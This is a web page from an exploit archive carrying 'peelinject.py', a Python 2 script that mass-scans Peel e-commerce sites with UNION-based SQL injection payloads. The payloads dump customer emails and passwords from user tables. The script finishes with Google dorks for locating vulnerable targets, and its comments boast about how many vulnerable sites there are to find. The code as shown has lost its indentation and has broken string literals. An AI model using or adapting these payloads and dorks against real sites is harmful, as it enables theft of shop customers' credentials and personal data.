Home / os / win7

Peel E-Commerce / Shopping SQL Injection

Posted on 22 February 2011

#!/usr/bin/python
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname        : peelinject.py
# Coder           : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version         : 0.1
# greetz for d3hydr8, rsauron, low1z, qk, marezzi, StRoNiX, t0r3x and all members of ex darkc0de.com and ljuska.org
# More vuln in next version
# So many vuln sites to find :)
#


import sys, os, re, time, urllib2

if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)

def logo():
print "
|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com                                      |"
print "|   02/2011     peelinject.py  v.0.1                            |"
print "|                                                               |"
print "|---------------------------------------------------------------|"

if len(sys.argv) !=2:
logo()
print "
Ex: ./peelinject.py http://www.site.com/
"
sys.exit(1)

vulnsql = ["lire/index.php?rubid=1+union+all+select+0,concat_ws(char(58),email,mot_passe,0x62616c74617a6172),2+from+peel_utilisateurs--", "lire/index.php?rubid=1+union+all+select+concat_ws(char(58),email,mot_passe,0x62616c74617a6172),1,2+from+peel_utilisateurs--", "lire/index.php?rubid=1+and+1=2+union+all+select+concat_ws(char(58),email,mot_passe,0x62616c74617a6172),1,2,3+from+jld_utilisateurs--", "lire/index.php?rubid=1+union+all+select+0,concat_ws(char(58),email,mot_passe,0x62616c74617a6172)+from+peel_utilisateurs--", "lire/index.php?rubid=1+union+all+select+0,concat_ws(char(58),email,mot_passe,0x62616c74617a6172)+from+utilisateurs--", "index.php?rubid=1+union+all+select+0,concat_ws(char(58),email,mot_passe,0x62616c74617a6172),2+from+peel_utilisateurs--"]

site = sys.argv[1]
if site[:4] != "http":
site = "http://"+site
if site [-1] != "/":
site = site + "/"

logo()
print "
[-] %s" % time.strftime("%X")
print "
[+] Target:", site
print "[+]",len(vulnsql),"Vulns loaded "
print "[+] Starting scan ...
"


for sql in vulnsql:
print "[+] Checking:" ,site+sql.replace("
","")
try:
target = urllib2.urlopen(site+sql.replace("
", "")).read()
if re.findall("baltazar", target):
print"[!] w00t!,w00t!: ",site+sql.replace("
", "")
print
else:
print "[-] Sorry, can't exploit :("
print
except(urllib2.HTTPError):
pass
except(KeyboardInterrupt, SystemExit):
pass

print "[!] Use this google dork for finding targets
"
print "	inurl:lire/index.php?rubid="
print "	inurl:/index.php?rubid=
"
print "
[-] %s" % time.strftime("%X")

 

TOP

Malware :

Exploits :